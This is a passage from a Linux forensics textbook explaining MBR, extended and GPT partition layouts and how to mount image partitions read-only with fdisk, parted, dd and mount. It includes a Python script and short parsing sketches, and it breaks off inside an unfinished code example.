Creating an image from physical media is a pretty simple process if the media has been removed. You can use a commercial write blocker if you have one. Personally, I prefer to use the udev rules-based system described earlier in this chapter. Regardless of what you use for write blocking, I strongly recommend you use USB 3.0 devices.

My personal setup consists of a Sabrent USB 3.0 hub model HB-UM43, which provides write blocking via my udev rules system, and a Sabrent USB 3.0 SATA drive dock model DS-UBLK. This combination can be purchased from multiple vendors for under US $40. My setup is shown in Figure 4.4.

FIGURE 4.4

An affordable disk imaging system.

SUMMARY

In this chapter we discussed how to create disk images. This included imaging tools such as dcfldd, software and hardware write-blockers, techniques, and inexpensive hardware options. In the next chapter we will delve into the topic of actually mounting these images so we can begin our dead (filesystem) analysis.

CHAPTER 5

Mounting Images

INFORMATION IN THIS CHAPTER:

Master Boot Record-based Partitions
Extended Partitions
GUID Partition Table Partitions
Mounting Partitions
Using Python to Automate the Mounting Process

PARTITION BASICS

It was common for early personal computers to have a single filesystem on their hard drives. Of course it was also common for their capacities to be measured in single digit megabytes. Once drives started becoming larger, people began organizing them into partitions.

Initially up to four partitions were available. When this was no longer enough, an inelegant solution, known as extended partitions, was developed in order to allow more than four partitions to be created on a drive. People put up with this kludge for decades before a better solution was developed. All of these partitioning systems will be discussed in detail in this chapter starting with the oldest.

Hard drives are described by the number of read/write heads, cylinders, and sectors. Each platter has circles of data which are called tracks. When you stack multiple circles on top of each other they start to look like a cylinder, and that is exactly what we call tracks that are on top of each other physically. Even when there is only one platter, there is a track on each side of the platter. The tracks are divided into chunks called sectors. Hard disk geometry is shown in Figure 5.1.

FIGURE 5.1

Hard disk geometry.

You will see entries for cylinders, heads, and sectors in some of the data structures discussed in this chapter. Most modern media use logical block addressing, but these remnants of an earlier time are still found. Whether or not these values are used is another story.

MASTER BOOT RECORD PARTITIONS

The first method of having multiple partitions was to create something called a Master Boot Record (MBR) on the first sector of the hard disk. This was developed way back in the 1980s. A maximum of four partitions are permitted in the Master Boot Record. At most one of these four partitions can be marked as bootable. The overall format for a MBR is shown in Table 5.1.

Table 5.1. Master Boot Record Format

Offset        Length        Item
0 (0x00)      446 (0x1BE)   Boot code
446 (0x1BE)   16 (0x10)     First partition
462 (0x1CE)   16 (0x10)     Second partition
478 (0x1DE)   16 (0x10)     Third partition
494 (0x1EE)   16 (0x10)     Fourth partition
510 (0x1FE)   2 (0x02)      Signature 0x55 0xAA
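The layout in Table 5.1 translates directly into byte slices. The sketch below is an illustration only, written for Python 3 (where file data is a bytes object); the function name split_mbr is hypothetical and not part of the book's scripts.

```python
def split_mbr(sector):
    """Split a 512-byte MBR into boot code, four raw entries, and signature."""
    if len(sector) < 512:
        raise ValueError("an MBR sector must be at least 512 bytes")
    boot_code = sector[0:446]
    # Four 16-byte partition entries start at offset 446
    entries = [sector[446 + i * 16:446 + (i + 1) * 16] for i in range(4)]
    signature = sector[510:512]
    return boot_code, entries, signature


if __name__ == "__main__":
    # A synthetic sector: empty boot code, one bootable entry, valid signature
    fake = bytes(446) + b"\x80" + bytes(63) + b"\x55\xaa"
    boot_code, entries, signature = split_mbr(fake)
    print(len(boot_code), [len(e) for e in entries], signature == b"\x55\xaa")
```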

Each of the partition entries in the MBR contains the information shown in Table 5.2.

Table 5.2. Partition Entry Format

Offset      Length     Item
0 (0x00)    1 (0x01)   Active flag (0x80 = bootable)
1 (0x01)    1 (0x01)   Start head
2 (0x02)    1 (0x01)   Start sector (bits 0-5); upper bits of cylinder (6-7)
3 (0x03)    1 (0x01)   Start cylinder lowest 8 bits
4 (0x04)    1 (0x01)   Partition type code (0x83 = Linux)
5 (0x05)    1 (0x01)   End head
6 (0x06)    1 (0x01)   End sector (bits 0-5); upper bits of cylinder (6-7)
7 (0x07)    1 (0x01)   End cylinder lowest 8 bits
8 (0x08)    4 (0x04)   Sectors preceding partition (little endian)
12 (0x0C)   4 (0x04)   Sectors in partition

Let’s discuss these fields in the partition entries one at a time. The first entry is an active flag where 0x80 means active and anything else (usually 0x00) is interpreted as inactive. In the Master Boot Record active means it is bootable. For obvious reasons there can be at most one bootable partition. That doesn’t mean that you cannot boot multiple operating systems, just that you must boot to some sort of selection menu program to do so.

The next entry is the starting head for the partition. This is followed by the starting sector and cylinder. Because the number of cylinders might exceed 255 and it is unlikely that so many sectors would be in a single track, the upper two bits from the byte storing the sector are the upper two bits for the cylinder. This leaves six bits for the sector and ten bits for the cylinder, which allows up to 63 sectors per track (sector numbering starts at one) and 1024 cylinders. Note that with only three bytes of storage, partitions must begin within the first eight gigabytes of the disk assuming standard 512 byte sectors.
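The bit packing described above can be sketched in a few lines of Python. This is an illustration under my own naming (decode_chs and MAX_CHS_BYTES are not from the book); it splits the sector byte into its six sector bits and two borrowed cylinder bits, and works out the largest offset that three address bytes can describe.

```python
def decode_chs(head_byte, sector_byte, cylinder_byte):
    """Decode the three CHS bytes of an MBR entry into (cylinder, head, sector)."""
    sector = sector_byte & 0x3F                       # bits 0-5
    cylinder = ((sector_byte & 0xC0) << 2) | cylinder_byte  # bits 6-7 become bits 8-9
    return cylinder, head_byte, sector


# 1024 cylinders * 256 heads * 63 sectors * 512 bytes per sector
MAX_CHS_BYTES = 1024 * 256 * 63 * 512

if __name__ == "__main__":
    print(decode_chs(0xFE, 0xFF, 0xFF))
    print(MAX_CHS_BYTES / 1024.0 ** 3, "GiB addressable through CHS")
```

The product comes to just under eight binary gigabytes, which is where the eight gigabyte limit comes from.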

The entry following the starting address is a partition type code. For Windows systems this type code is used to determine the filesystem type. Linux systems normally use 0x83 as the partition type and any supported filesystem may be installed on the partition. Partition type 0x82 is used for Linux swap partitions.

The cylinder/head/sector address of the end of the partition follows the partition type. The same format is used as that for the starting address of the partition. The number of sectors preceding the partition and total sectors occupy the last two positions in the partition entry. Note that these are both 32-bit values, which allows devices up to two terabytes (2048 gigabytes) to be supported with 512 byte sectors. Most modern devices use Logical Block Addressing (LBA) and the cylinder/head/sector addresses are essentially ignored.
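Putting Table 5.2 together, a whole 16-byte entry can be decoded in one call to struct.unpack. The sketch below targets Python 3 and uses names of my own choosing (PartitionEntry, parse_partition_entry); the cylinder/head/sector bytes are read but deliberately ignored, since LBA values are what we need for mounting.

```python
import struct
from collections import namedtuple

# Hypothetical container for the fields we care about
PartitionEntry = namedtuple(
    "PartitionEntry", "bootable type_code start_lba sector_count")


def parse_partition_entry(entry):
    """Decode one 16-byte MBR partition entry (see Table 5.2)."""
    # B = flag, 3s = start CHS, B = type, 3s = end CHS, I I = two 32-bit LBAs
    flag, _start_chs, type_code, _end_chs, start_lba, count = struct.unpack(
        "<B3sB3sII", entry)
    return PartitionEntry(flag == 0x80, type_code, start_lba, count)


# Largest size expressible with a 32-bit sector count and 512-byte sectors
MAX_MBR_BYTES = (2 ** 32) * 512

if __name__ == "__main__":
    raw = bytes([0x80, 1, 1, 0, 0x83, 0xFE, 0xFF, 0xFF]) + struct.pack(
        "<II", 63, 208782)
    print(parse_partition_entry(raw))
    print(MAX_MBR_BYTES // 1024 ** 4, "TiB")
```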

EXTENDED PARTITIONS

When four partitions were no longer enough, a new system was invented. This system consists of creating one or more extended partitions in the four available slots in the MBR. The most common extended partition types are 0x05 and 0x85, with the former used by Windows and Linux and the latter used only by Linux. Each extended partition becomes a logical drive with an MBR of its own. Normally only the first two slots in the extended partition MBR are used.

The addresses in partition entries in the extended partition’s MBR are relative to the start of the extended partition (it is its own logical drive after all). Logical partitions in the extended partition can also be extended partitions. In other words, extended partitions can be nested, which allows more than eight partitions to be created. In the case of nested extended partitions, the last partition is indicated by an empty entry in the second slot in that extended partition’s MBR. Nested extended partitions are shown in Figure 5.2.

FIGURE 5.2

Nested Extended Partitions.
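Following the chain of nested extended partitions is essentially a linked-list walk. The Python 3 sketch below is a hedged illustration, not the book's code. It assumes the commonly seen convention that the first slot of each mini-MBR is relative to that mini-MBR, while the second slot (the link to the next one) is relative to the start of the outermost extended partition; verify this against your own image (fdisk reports absolute addresses) before relying on it. The names read_entries and logical_partitions are hypothetical.

```python
import io
import struct

EXTENDED_TYPES = (0x05, 0x0F, 0x85)


def read_entries(image, lba, sector_size=512):
    """Return the four (type, start, count) entries of the table at sector lba."""
    image.seek(lba * sector_size)
    sector = image.read(sector_size)
    if sector[510:512] != b"\x55\xaa":
        raise ValueError("no boot signature at LBA %d" % lba)
    entries = []
    for i in range(4):
        raw = sector[446 + i * 16:462 + i * 16]
        start, count = struct.unpack("<II", raw[8:16])
        entries.append((raw[4], start, count))
    return entries


def logical_partitions(image, extended_start):
    """Walk the mini-MBR chain; return (type, absolute start, sectors) tuples."""
    found = []
    seen = set()
    ebr = extended_start
    while ebr not in seen:          # guard against looping chains
        seen.add(ebr)
        first, second = read_entries(image, ebr)[:2]
        if first[0] != 0:
            found.append((first[0], ebr + first[1], first[2]))
        if second[0] not in EXTENDED_TYPES:
            break                   # empty second slot: end of the chain
        ebr = extended_start + second[1]
    return found


if __name__ == "__main__":
    # An empty extended partition at LBA 0 of a one-sector fake image
    blank = bytearray(512)
    blank[510:512] = b"\x55\xaa"
    print(logical_partitions(io.BytesIO(bytes(blank)), 0))
```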

GUID PARTITIONS

The method of creating partitions is not the only thing showing its age. The Basic Input Output System (BIOS) boot process is also quite outdated. Under the BIOS boot process an ultramodern 64-bit computer is not started in 64-bit mode. It isn’t even started in 32-bit mode. The CPU is forced to regress all the way back to 16-bit compatibility mode. In fact, if you examine the boot code in the MBR you will discover that it is 16-bit machine code.

The BIOS boot process has been replaced with the Unified Extensible Firmware Interface (UEFI) boot process. UEFI (pronounced ooh-fee) booting allows a computer to start in 64-bit mode directly. All 64-bit computers shipped today use UEFI and not BIOS for booting, although they support legacy booting from MBR-based drives. This legacy support is primarily intended to allow booting from removable media such as DVDs and USB drives.

A new method of specifying partitions was also created to go along with UEFI. This new method assigns a Globally Unique Identifier (GUID) to each partition. The GUIDs are stored in a GUID Partition Table (GPT). The GPT has space for 128 partitions. In addition to the primary GPT, there is a secondary GPT stored at the end of the disk (highest numbered logical block) to reduce the chance that bad sectors in the GPT render a disk unreadable.

A drive using GUID partitioning begins with a protective MBR. This MBR has a single entry covering the entire disk with a partition type of 0xEE. Legacy systems that don’t know how to process a GPT also don’t know what to do with a partition of type 0xEE, so they will ignore the entire drive. This is preferable to having the drive accidentally formatted if it appears empty or unformatted.

As has been mentioned previously, modern systems use Logical Block Addressing (LBA). The protective MBR is stored in LBA 0. The primary GPT begins with a header in LBA 1, followed by GPT entries in LBA 2 through LBA 33. Each GPT entry requires 128 bytes. As a result, there are four entries per standard 512 byte block, and the 128 entries fill 32 blocks. While GPT entries are 128 bytes today, the specification allows for larger entries (with size specified in the GPT header) to be used in the future. Blocks are probably 512 bytes long, but this should not be assumed. The secondary GPT header is stored in the last LBA and the secondary GPT entries are stored in the preceding 32 sectors. The layout of a GPT-based drive is shown in Figure 5.3.

FIGURE 5.3

Layout of a drive with GUID partitioning.

The GPT header format is shown in Table 5.3. When attempting to mount images of drives using GUID partitioning, this header should be checked in order to future proof any scripts should the default values shown in the table change.

Table 5.3. GUID Partition Table Header Format.

Offset      Length      Contents
0 (0x00)    8 bytes     Signature (“EFI PART” or 0x5452415020494645)
8 (0x08)    4 bytes     Revision in Binary Coded Decimal format (version 1.0 = 0x00 0x00 0x01 0x00)
12 (0x0C)   4 bytes     Header size in bytes (92 bytes at present)
16 (0x10)   4 bytes     Header CRC32 checksum
20 (0x14)   4 bytes     Reserved; must be zero
24 (0x18)   8 bytes     Current LBA (where this header is located)
32 (0x20)   8 bytes     Backup LBA (where the other header is located)
40 (0x28)   8 bytes     First usable LBA for partitions
48 (0x30)   8 bytes     Last usable LBA for partitions
56 (0x38)   16 bytes    Disk GUID
72 (0x48)   8 bytes     Starting LBA of array of partition entries
80 (0x50)   4 bytes     Number of partition entries in array
84 (0x54)   4 bytes     Size of a single partition entry (usually 128)
88 (0x58)   4 bytes     CRC32 checksum of the partition array
92 (0x5C)   remainder   Reserved; must be zeroes for the rest of the block
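The header in Table 5.3 maps onto a single struct format string. The following Python 3 sketch is an illustration with hypothetical names (GPT_HEADER, parse_gpt_header, entry_array_blocks); it reads the entry count and entry size from the header rather than assuming 128 of each, and it does not verify either CRC32 checksum.

```python
import struct
import uuid

# 8s=signature, 4 x I, 4 x Q, 16s=disk GUID, Q=entries LBA, 3 x I  (92 bytes)
GPT_HEADER = struct.Struct("<8sIIIIQQQQ16sQIII")


def parse_gpt_header(block):
    """Decode the fixed 92-byte part of a GPT header (checksums not verified)."""
    (signature, revision, header_size, _header_crc, _reserved,
     current_lba, backup_lba, first_usable, last_usable, disk_guid,
     entries_lba, entry_count, entry_size, _entries_crc) = GPT_HEADER.unpack(
         block[:GPT_HEADER.size])
    if signature != b"EFI PART":
        raise ValueError("not a GPT header")
    return {
        "revision": revision,
        "header_size": header_size,
        "current_lba": current_lba,
        "backup_lba": backup_lba,
        "first_usable_lba": first_usable,
        "last_usable_lba": last_usable,
        "disk_guid": uuid.UUID(bytes_le=disk_guid),  # GUIDs are mixed-endian
        "entries_lba": entries_lba,
        "entry_count": entry_count,
        "entry_size": entry_size,
    }


def entry_array_blocks(header, block_size=512):
    """Number of blocks occupied by the partition entry array (rounded up)."""
    total = header["entry_count"] * header["entry_size"]
    return (total + block_size - 1) // block_size


if __name__ == "__main__":
    fake = GPT_HEADER.pack(b"EFI PART", 0x00010000, 92, 0, 0, 1, 999, 34, 966,
                           bytes(16), 2, 128, 128, 0)
    hdr = parse_gpt_header(fake)
    print(hdr["entries_lba"], entry_array_blocks(hdr))
```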

The format for each partition entry is shown in Table 5.4. The format for the attributes field in these entries is shown in Table 5.5. Unlike MBR-based partitions with one byte to indicate partition type, GPT-based partitions have a 16-byte GUID for specifying the partition type. This type GUID is followed by a partition GUID (essentially a serial number) which is also sixteen bytes long. You might see Linux documentation refer to this partition GUID as a Universally Unique Identifier (UUID).

Table 5.4. GUID Partition Table Entry Format.

Offset      Length      Item
0 (0x00)    16 (0x10)   Partition type GUID
16 (0x10)   16 (0x10)   Unique partition GUID
32 (0x20)   8 (0x08)    First LBA
40 (0x28)   8 (0x08)    Last LBA
48 (0x30)   8 (0x08)    Attributes
56 (0x38)   72 (0x48)   Partition name (UTF-16 encoding)

Table 5.5. GUID Partition Table Entry Attributes Format.

Bit     Content            Description
0       System partition   Must preserve partition as is
1       EFI firmware       Operating system should ignore this partition
2       Legacy BIOS boot   Equivalent to 0x80 in MBR
3-47    Reserved           Should be zeros
48-63   Type specific      Varies by partition type (60 = RO, 62 = Hidden, 63 = No automount for Windows)

The start and end LBA follow the UUID. Next come the attributes and then the partition name, which can be up to 36 Unicode characters long. Attribute fields are 64 bits long. As can be seen in Table 5.5, the lowest three bits are used to indicate a system partition, firmware partition, and support for legacy boot. System partitions are not to be changed and firmware partitions are to be completely ignored by operating systems. The meaning of the upper sixteen bits of the attribute field depends on the partition type.
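Tables 5.4 and 5.5 can be decoded in much the same way as the header. The Python 3 sketch below is only an illustration; GPT_ENTRY and parse_gpt_entry are names I made up, and the entry size is fixed at 128 bytes here for brevity even though a real script should take it from the GPT header.

```python
import struct
import uuid

# type GUID, partition GUID, first LBA, last LBA, attributes, UTF-16 name
GPT_ENTRY = struct.Struct("<16s16sQQQ72s")


def parse_gpt_entry(raw):
    """Decode one 128-byte GPT partition entry."""
    type_guid, part_guid, first_lba, last_lba, attrs, name = GPT_ENTRY.unpack(
        raw[:GPT_ENTRY.size])
    return {
        "unused": type_guid == bytes(16),        # all-zero type GUID = empty slot
        "type_guid": uuid.UUID(bytes_le=type_guid),
        "partition_guid": uuid.UUID(bytes_le=part_guid),
        "first_lba": first_lba,
        "last_lba": last_lba,
        "system": bool(attrs & (1 << 0)),
        "firmware_ignore": bool(attrs & (1 << 1)),
        "legacy_boot": bool(attrs & (1 << 2)),
        "type_specific": attrs >> 48,            # upper sixteen bits
        # The name is null padded; keep everything before the first null
        "name": name.decode("utf-16-le").split("\x00", 1)[0],
    }


if __name__ == "__main__":
    linux_data = uuid.UUID("0fc63daf-8483-4772-8e79-3d69d8477de4")
    serial = uuid.UUID("12345678-1234-5678-1234-567812345678")  # made up
    raw = GPT_ENTRY.pack(linux_data.bytes_le, serial.bytes_le, 2048, 4095,
                         1 << 2, "root".encode("utf-16-le"))
    print(parse_gpt_entry(raw))
```

The mount offset for such a partition is simply first_lba multiplied by the block size.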

MOUNTING PARTITIONS FROM AN IMAGE FILE ON LINUX

Linux is the best choice for a forensics platform for several reasons, regardless of the operating system used by the subject system. One of the many reasons that this is true is the ease with which an image file can be mounted. Once filesystems in an image have been mounted, all of the standard system tools can be used as part of the investigation.

Linux tools, such as fdisk, can also be used directly on an image file. This fact might not be immediately obvious, but we will show it to be true. The key to being able to use our normal tools is Linux’s support for loop devices. In a nutshell, a loop device allows a file to be treated as a block device by Linux.

The command for running fdisk on an image is simply fdisk <image file>. After fdisk has been run, the partition table is easily printed by typing p <enter>. The key piece of information you need for each partition to mount it is the starting sector (LBA). The results of running fdisk and printing the partition table for a Windows virtual machine image are shown in Figure 5.4. Note that in most cases we do not need to know the partition type as the Linux mount command is smart enough to figure this out on its own.

The single primary partition in the image from Figure 5.4 begins at sector 63. In order to mount this image we need to first create a mount point directory by typing sudo mkdir <mount point>, e.g. sudo mkdir /media/win-c. Next we need to mount the filesystem using the mount command. The general syntax for the command is mount [options] <source device> <mount point directory>.

FIGURE 5.4

Running fdisk on an image file. Note that root privileges are not required to run fdisk on an image. The starting sector will be needed later for mounting.

The options required to mount an image in a forensically sound way are ro (read-only) and noatime (no access time updating). The second option might seem unnecessary, but it ensures that certain internal timestamps are not updated accidentally. Mounting an image file requires the loop and offset options.

Putting all of these together, the full mount command is sudo mount -o ro,noatime,loop,offset=<offset to start of partition in bytes> <image file> <mount point directory>. The offset can be calculated using a calculator or a little bash shell trick. Just like commands can be executed by enclosing them in $(), you can do math on the command line by enclosing mathematical operations in $(()).

Using our bash shell trick, the proper command is sudo mount -o ro,noatime,loop,offset=$((<starting sector>*512)) <image file> <mount point directory>. The series of commands to mount the image from Figure 5.4 are shown in Figure 5.5.

FIGURE 5.5

Mounting a single primary partition from an image file.
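The same arithmetic is easy to express in Python, which is where this chapter is heading. The sketch below only builds the argument list for mount; it does not run anything. The function name mount_command and the file name win.img are hypothetical.

```python
def mount_command(image, mount_point, start_sector, sector_size=512):
    """Build the argument list for a read-only loop mount of one partition."""
    offset = start_sector * sector_size   # mount wants bytes, fdisk gives sectors
    options = "ro,noatime,loop,offset=%d" % offset
    return ["mount", "-o", options, image, mount_point]


if __name__ == "__main__":
    # Partition starting at sector 63, as in Figure 5.4
    print(" ".join(mount_command("win.img", "/media/win-c", 63)))
```

For a starting sector of 63 the offset works out to 32256 bytes.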

What if your image contains extended partitions? The procedure is exactly the same. An image with an extended partition is shown in Figure 5.6. Note that fdisk translates the relative sector addresses inside the extended partition to absolute addresses in the overall image. Also note that the swap partition inside the extended primary partition starts two sectors into the partition. The first sector is used by the extended partition’s mini-MBR and the second is just padding to make the swap partition start on an even-numbered sector.

The mini-MBR from the extended partition in the image from Figure 5.6 is shown in Figure 5.7. The partition type, 0x82, is highlighted in the figure. Recall that this is the type code for a Linux swap partition. Notice that the second MBR entry is blank, indicating that there are no extended partitions nested inside this one. The dd command was used to generate this figure.

FIGURE 5.6

An image file with an extended partition.

FIGURE 5.7

A mini-MBR from an extended partition. The highlighted byte is the partition type, 0x82, which indicates this is a swap partition. Note that the second entry is blank, indicating there are no nested extended partitions under this one.

A quick way to view a single sector from an image is to issue the command dd skip=<sector number> bs=<sector size> count=1 if=<image file> | xxd. The command used to generate Figure 5.7 was dd skip=33556478 bs=512 count=1 if=pentester-academy-subject1-flat.vmdk | xxd. It is important to realize that dd uses blocks (with a default block size of 512) whereas mount uses bytes. This is why we don’t have to do any math to use dd.
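For readers who would rather stay in Python, the dd and xxd pipeline can be approximated with a seek and a small hex formatter. This is a rough Python 3 sketch with hypothetical names (read_sector, hex_dump); unlike xxd it prints only the offset and hex bytes, without the ASCII column.

```python
import io


def read_sector(image, sector_number, sector_size=512):
    """Return one sector from an open binary image (like dd skip=N count=1)."""
    image.seek(sector_number * sector_size)
    return image.read(sector_size)


def hex_dump(data, width=16):
    """Format bytes as lines of 'offset: hex bytes'."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        lines.append("%08x: %s" % (offset, " ".join("%02x" % b for b in chunk)))
    return "\n".join(lines)


if __name__ == "__main__":
    # Two-sector stand-in for a real image opened with open(<image file>, "rb")
    fake_image = io.BytesIO(bytes(512) + bytes(510) + b"\x55\xaa")
    print(hex_dump(read_sector(fake_image, 1)[-16:]))
```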

The commands required and also the results of mounting the primary partition from Figure 5.6 are shown in Figure 5.8. Notice that my Ubuntu system automatically popped up the file browser window shown. This is an example of behavior that can be customized using udev rules as described earlier in this book.

FIGURE 5.8

Mounting a Linux partition in an image from the command line.

What if your subject system is using GUID Partition Tables (GPT)? The results of running fdisk against such a system are shown in Figure 5.9. The only partition displayed covers the entire disk and has type 0xEE. This is the protective MBR discussed earlier in this chapter. Note that fdisk displays a warning that includes the correct utility to run for GPT drives.

FIGURE 5.9

Running fdisk on a drive that uses GUID Partition Tables.

The results of running parted on the GPT drive from Figure 5.9 are shown in Figure 5.10. In the figure we see a system partition which is marked as bootable, several NTFS partitions, an ext4 partition, and a Linux swap partition. This is a computer that came preloaded with Windows 8.1 with secure boot (which really means make it difficult to boot anything other than Windows) which has had Linux installed after the fact.

FIGURE 5.10

Result of running parted on the GPT drive from Figure 5.9.

You may have noticed that the results displayed in Figure 5.10 specify the start and stop of partitions in kilobytes, megabytes, and gigabytes. In order to mount a partition we need to know the exact start of each partition. The unit command in parted allows us to specify how these values are displayed. Two popular choices are s and B, which stand for sectors and bytes, respectively. The results of executing the parted print command using both sectors and bytes are shown in Figure 5.11.

FIGURE 5.11

Changing the default units in parted to show partition boundaries in sectors and bytes.

Once the starting offset is known, mounting a partition from a GPT image is exactly the same as the preceding two cases (primary or extended partitions on MBR-based drives). The parted utility can be used on MBR-based drives as well, but the default output is not as easy to use. Next we will discuss using Python to make this mounting process simple regardless of what sort of partitions we are attempting to mount.

USING PYTHON TO AUTOMATE THE MOUNTING PROCESS

Automation is a good thing. It saves time and also prevents mistakes caused by fat-fingering values. Up to this point in the book we have used shell scripting for automation. In order to mount our partitions we will utilize the Python scripting language. As this is not a book on Python, I will primarily only be describing how my scripts work. For readers that want more in-depth coverage of Python I highly recommend the Python course at PentesterAcademy.com (http://www.pentesteracademy.com/course?id=1).

WHAT IS IT GOOD FOR?

Scripting or Programming Language

You will see me refer to Python as a scripting language in this book. Some might say that it is a programming language. Which is correct? They are both correct. In my mind a scripting language is an interpreted language that allows you to quickly do work. Python certainly meets these criteria.

To me, a programming language is something that is used to create large programs and software systems. There are some that certainly have done this with Python. However, I would argue that Python is not the best choice when performance is an issue and the same program will be run many times without any code modifications. I’m sure that anyone who has ever run a recent version of Metasploit would agree that running large programs written in interpreted languages can be painful.

You might ask why we are switching to Python. This is a valid question. There are a couple of reasons to use Python for this task. First, we are no longer just running programs and pushing bytes around. Rather, we are reading in files, interpreting them, performing calculations, and then running programs. Second, we are looking to build a library of code to use in our investigations. Having Python code that interprets MBR and GPT data is likely to be useful further down the road.

MBR-based primary partitions

We will start with the simplest case, primary partitions from MBR-based drives. I have broken up the mounting code into three separate scripts for simplicity. Feel free to combine them if that is what you prefer. It is open source after all. The following script will mount primary partitions from an MBR-based image file.

#!/usr/bin/python
#
# mount-image.py
# This is a simple Python script that will
# attempt to mount partitions from an image file.
# Images are mounted read-only.
#
# Developed by Dr. Phil Polstra (@ppolstra)
# for PentesterAcademy.com

import sys
import os.path
import subprocess
import struct

"""
Class MbrRecord: decodes a partition record from a Master Boot Record
Usage: rec = MbrRecord(sector, partno) where
  sector is the 512 byte or greater sector containing the MBR
  partno is the partition number 0-3 of interest
  rec.printPart() prints partition information
"""
class MbrRecord():
    def __init__(self, sector, partno):
        self.partno = partno
        # first record at offset 446 & records are 16 bytes
        offset = 446 + partno * 16
        self.active = False
        # first byte == 0x80 means active (bootable)
        if sector[offset] == '\x80':
            self.active = True
        self.type = ord(sector[offset+4])
        self.empty = False
        # partition type == 0 means it is empty
        if self.type == 0:
            self.empty = True
        # sector values are 32-bit and stored in little endian format
        self.start = struct.unpack('<I', sector[offset + 8: \
            offset + 12])[0]
        self.sectors = struct.unpack('<I', sector[offset + 12: \
            offset + 16])[0]

    def printPart(self):
        if self.empty == True:
            print("<empty>")
        else:
            outstr = ""
            if self.active == True:
                outstr += "Bootable:"
            outstr += "Type " + str(self.type) + ":"
            outstr += "Start " + str(self.start) + ":"
            outstr += "Total sectors " + str(self.sectors)
            print(outstr)

def usage():
    print("usage " + sys.argv[0] +
        " <image file>\nAttempts to mount partitions from an image file")
    exit(1)

def main():
    if len(sys.argv) < 2:
        usage()
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    with open(sys.argv[1], 'rb') as f:
        sector = str(f.read(512))
    if (sector[510] == "\x55" and sector[511] == "\xaa"):
        print("Looks like a MBR or VBR")
        # if it is an MBR bytes 446, 462, 478, and 494 must be 0x80 or 0x00
        if (sector[446] == '\x80' or sector[446] == '\x00') and \
           (sector[462] == '\x80' or sector[462] == '\x00') and \
           (sector[478] == '\x80' or sector[478] == '\x00') and \
           (sector[494] == '\x80' or sector[494] == '\x00'):
            print("Must be a MBR")
            parts = [MbrRecord(sector, 0), MbrRecord(sector, 1), \
                     MbrRecord(sector, 2), MbrRecord(sector, 3)]
            for p in parts:
                p.printPart()
                if not p.empty:
                    notsupParts = [0x05, 0x0f, 0x85, 0x91, 0x9b, 0xc5, 0xe4, 0xee]
                    if p.type in notsupParts:
                        print("Sorry GPT and extended partitions are " +
                              "not supported by this script!")
                    else:
                        mountpath = '/media/part%s' % str(p.partno)
                        # if the appropriate directory doesn't exist create it
                        if not os.path.isdir(mountpath):
                            subprocess.call(['mkdir', mountpath])
                        mountopts = 'loop,ro,noatime,offset=%s' % \
                            str(p.start * 512)
                        subprocess.call(['mount', '-o', \
                            mountopts, sys.argv[1], mountpath])
        else:
            print("Appears to be a VBR\nAttempting to mount")
            if not os.path.isdir('/media/part1'):
                subprocess.call(['mkdir', '/media/part1'])
            subprocess.call(['mount', '-o', 'loop,ro,noatime', \
                sys.argv[1], '/media/part1'])

if __name__ == "__main__":
    main()

Let’s break down the preceding script. It begins with the usual she-bang; however, this time we are running the Python interpreter instead of the bash shell. Just as with shell scripts, all of the lines beginning with “#” are comments. We then import Python libraries sys, os.path, subprocess, and struct which are needed to get command line arguments, check for the existence of files, launch other processes or commands, and interpret values in the MBR, respectively.

Next we define a class MbrRecord which is used to decode the four partition entries in the MBR. The class definition is preceded with a Python multi-line comment known as a docstring. Three double quotes on a line start or stop the docstring. Like many object-oriented languages, Python uses classes to implement objects. Python is different from other languages in that it uses indentation to group lines of code together and doesn’t use a line termination character such as the semicolon used by numerous languages.

The line class MbrRecord(): tells the Python interpreter that a class definition for the MbrRecord class follows on indented lines. The empty parentheses indicate that there is no base class. In other words, the MbrRecord is not a more specific (or specialized) version of some other object. Base classes can be useful as they allow you to more easily and elegantly share common code, but they are not used extensively by people who use Python to write quick and dirty scripts to get things done.

The line def __init__(self, sector, partno): inside the MbrRecord class definition begins a function definition. Python allows classes to define functions (sometimes called methods) and values (also called variables, parameters, or data members) that are associated with the class. Every class implicitly defines a value called self that is used to refer to an object of the class type. With a few exceptions (not described in this book) every class function must have self as the first (possibly only) argument it accepts. This argument is implicitly passed by Python. We will talk more about this later as I explain this script.

Every class should define an __init__ function (that is a double underscore preceding and following init). This special function is called a constructor. It is used when an object of a certain type is created. The __init__ function in the MbrRecord class is used as follows:

partition = MbrRecord(sector, partitionNumber)

This creates a new object called partition of the MbrRecord type. If we want to print its contents we can call its printPart function like so:

partition.printPart()

Back to the constructor definition. We first store the passed in partition number in a class value on the line self.partno = partno. Then we calculate the offset into the MBR for the partition of interest with offset = 446 + partno * 16, as the first record is at offset 446 and each record is 16 bytes long.

Next we check to see if the first byte in the partition entry is 0x80, which indicates the partition is active (bootable). Python, like many other languages, can treat strings as arrays. Also, like most languages, the indexes are zero-based. The == operator is used to check equality and the = operator is used for assignment. A single byte hexadecimal value in Python can be represented by a packed string containing a “\x” prefix. For example, '\x80' in our script means 0x80. Putting all of this together we see that the following lines set a class value called active to False and then reset the value to True if the first byte in a partition entry is 0x80. Note that Python uses indentation to determine what is run if the if statement evaluates to True.

self.active = False
# first byte == 0x80 means active (bootable)
if sector[offset] == '\x80':
    self.active = True

After interpreting the active flag, the MbrRecord constructor retrieves the partition type and stores it as a numerical value (not a packed string) on the line self.type = ord(sector[offset+4]). The construct ord(<single character>) is used to convert a packed string into an integer value. Next the type is checked for equality with zero. If it is zero, the class value of empty is set to True.

Finally, the starting and total sectors are extracted from the MBR and stored in appropriate class values. There is a lot happening in these two lines. It is easier to understand it if you break it down. We will start with the statement sector[offset + 8: offset + 12]. In Python parlance this is known as an array slice. An array is nothing but a list of values that are indexed with zero-based integers. So myArray[0] is the first item in myArray, myArray[1] is the second, etc. To specify a subarray (slice) in Python the syntax is myArray[<first index of slice>:<last index of slice + 1>]. For example, if myArray contains “This is the end, my one true friend!” then myArray[8:15] would be equal to “the end”.
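The slicing rule is easy to try out for yourself. The short Python 3 sketch below repeats the example from the text and then applies the same idea to a stand-in sector; the variable names and the fake sector contents are made up for illustration.

```python
# The example from the text: characters 8 through 14 are selected
my_array = "This is the end, my one true friend!"
the_end = my_array[8:15]

# A stand-in 512-byte "sector" whose byte values simply count upward
sector = bytes(range(256)) * 2
offset = 446                         # first partition entry
# Four bytes holding the starting sector of the partition (entry offset 8-11)
start_field = sector[offset + 8:offset + 12]

if __name__ == "__main__":
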